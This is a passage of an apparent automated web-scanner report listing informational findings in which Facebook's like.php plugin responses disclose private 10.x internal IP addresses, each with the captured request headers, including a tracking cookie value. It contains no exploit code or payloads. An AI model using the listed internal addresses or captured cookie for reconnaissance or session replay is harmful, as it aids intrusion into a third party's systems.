GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df55879b04%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff399bdf3c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.766. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.150.50

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df236de4684%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f13fbd2c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.767. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.220.61

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df163c489c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff7024fb3%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.768. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.205.52

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df13acfec3%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffb16b3e24%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.769. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.118.75

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfe3e70054%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff17b9d8228%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.770. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.245.53

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1f82028f4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3774078cc%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.771. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.91.42

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df14add876c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff118208ba%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.772. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.210.46

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df110d92d54%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3a6b1c944%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43418837&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43418837
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.773. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.33.25.117

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2724bfef%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2b3573fd%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.774. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.235.105

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3a1fc6948%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff17e34cb9%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.775. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.44.56

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2cde5d9a4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2b1d388a%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.776. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.116.35

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FRadiumOne%2F113084648745200%3Fv%3Dpage_getting_started&layout=standard&show_faces=false&width=450&action=like&font=arial&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://radiumone.com/network/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.777. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.225.36

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df30be45ae%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff21c8141dc%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.778. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.77.42

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1ed102d2%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff395dfe8a%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.779. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.29.30

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfd58836c8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3d9bc292c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.780. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.42.59

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df221ac9014%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff27817871c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.781. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.55.6.53

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfec61a178%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff25c0fb1fc%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.782. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.63.29.57

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df334529e3c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3f366f4d8%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.783. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.132.64

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FRadiumOne%2F113084648745200%3Fv%3Dpage_getting_started&layout=standard&show_faces=false&width=450&action=like&font=arial&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://radiumone.com/social/developer.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.784. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.69.34

Request

Response

19.785. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.233.64

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2ab9bc394%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff8749c90c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
